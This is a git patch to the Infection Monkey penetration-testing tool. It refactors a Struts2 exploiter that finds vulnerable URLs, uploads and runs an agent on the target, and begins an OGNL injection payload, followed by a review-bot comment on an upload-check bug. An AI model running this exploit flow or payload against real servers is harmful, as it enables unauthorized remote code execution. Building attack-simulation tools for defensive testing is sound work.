From 6cb058eb1d325c05687caa704d8e82c43818ef1f Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Fri, 10 Aug 2018 15:04:23 +0300
Subject: [PATCH] Struts2 refactored for framework fixes

---
 infection_monkey/exploit/struts2.py | 26 +++++++++++---------------
 1 file changed, 11 insertions(+), 15 deletions(-)

diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py
index 395fe422a..2b672f290 100644
--- a/infection_monkey/exploit/struts2.py
+++ b/infection_monkey/exploit/struts2.py
@@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE): super(Struts2Exploiter, self).__init__(host) def exploit_host(self): - # We need a reference to the exploiter for WebRCE framework to use - exploiter = self.exploit # Get open ports - ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) + ports = self.get_ports_w(self.HTTP, ["http"]) if not ports: return False # Get urls to try to exploit - urls = WebRCE.build_potential_urls(self.host, ports) + urls = self.build_potential_urls(ports) vulnerable_urls = [] for url in urls: # Get full URL url = self.get_redirected(url) - if WebRCE.check_if_exploitable(exploiter, url): + if self.check_if_exploitable(url): vulnerable_urls.append(url) self._exploit_info['vulnerable_urls'] = vulnerable_urls if not vulnerable_urls: return False - # We need to escape backslashes for our exploiter - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32) - config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64) - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): + if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True - if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + if not self.set_host_arch(vulnerable_urls[0]): return False - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0]) + data = self.upload_monkey(vulnerable_urls[0]) # We can't use 'if not' because response may be '' - if data is not False and data['response'] == False: + if data is not False and data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if 
WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: return False return True @@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE): :param cmd: Code to try and execute on host :return: response """ + cmd = re.sub(r"\\", r"\\\\", cmd) + cmd = re.sub(r"'", r"\\'", cmd) payload = "%%{(#_='multipart/form-data')." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#_memberAccess?" \
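Review bot: The upload guard in exploit_host still lets a failed upload reach the subscripts below it: `if data is not False and data['response'] is False` returns early only when `upload_monkey` handed back a dict with a false response, so in the `False` case the guard itself anticipates, the next line evaluates `data['path']` on a bool and raises TypeError instead of returning False. The condition should read `if data is False or data['response'] is False:` with the existing `return False` kept, which also keeps the "can't use 'if not'" comment above it accurate. exploit_host also has no docstring; a one-liner such as `"""Return True if the monkey was deployed via one of the host's vulnerable URLs, False otherwise."""` would document the boolean result the method returns on every path.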